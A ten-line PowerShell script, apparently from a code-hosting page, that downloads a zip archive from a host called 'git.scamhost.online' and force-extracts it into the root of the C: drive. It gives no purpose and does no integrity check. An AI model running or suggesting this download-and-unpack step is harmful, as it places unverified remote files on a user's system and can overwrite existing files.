10 lines
330 B
PowerShell
10 lines
330 B
PowerShell
$url = "https://git.scamhost.online/fear/fear-ss/archive/alpha.zip"
|
|
$destPath = "C:\"
|
|
$zipFile = "$destPath\archive.zip"
|
|
|
|
New-Item -ItemType Directory -Force -Path $destPath | Out-Null
|
|
|
|
Invoke-WebRequest -Uri $url -OutFile $zipFile
|
|
Expand-Archive -Path $zipFile -DestinationPath $destPath -Force
|
|
Remove-Item -Path $zipFile -Force
|